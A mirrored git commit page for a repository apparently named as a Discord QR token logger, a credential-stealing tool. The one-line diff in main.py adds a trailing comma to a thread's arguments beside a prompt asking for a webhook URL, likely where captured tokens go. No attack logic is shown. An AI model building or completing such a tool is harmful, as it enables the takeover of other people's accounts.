mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-07-30 14:28:13 +00:00
Update main.py
This commit is contained in:
parent
1091fc7988
commit
2908e6c75a
@ -193,7 +193,7 @@ if __name__ == "__main__":
|
|||||||
args=(
|
args=(
|
||||||
Write.Input("\n[*] Enter your webhook url -> ",
|
Write.Input("\n[*] Enter your webhook url -> ",
|
||||||
Colors.green_to_cyan,
|
Colors.green_to_cyan,
|
||||||
interval=0.01)
|
interval=0.01),
|
||||||
))
|
))
|
||||||
elif (confir == NO) or (confir == NO.upper()):
|
elif (confir == NO) or (confir == NO.upper()):
|
||||||
th_main = Thread(target=main, args=(None,))
|
th_main = Thread(target=main, args=(None,))
|
||||||
|
Loading…
x
Reference in New Issue
Block a user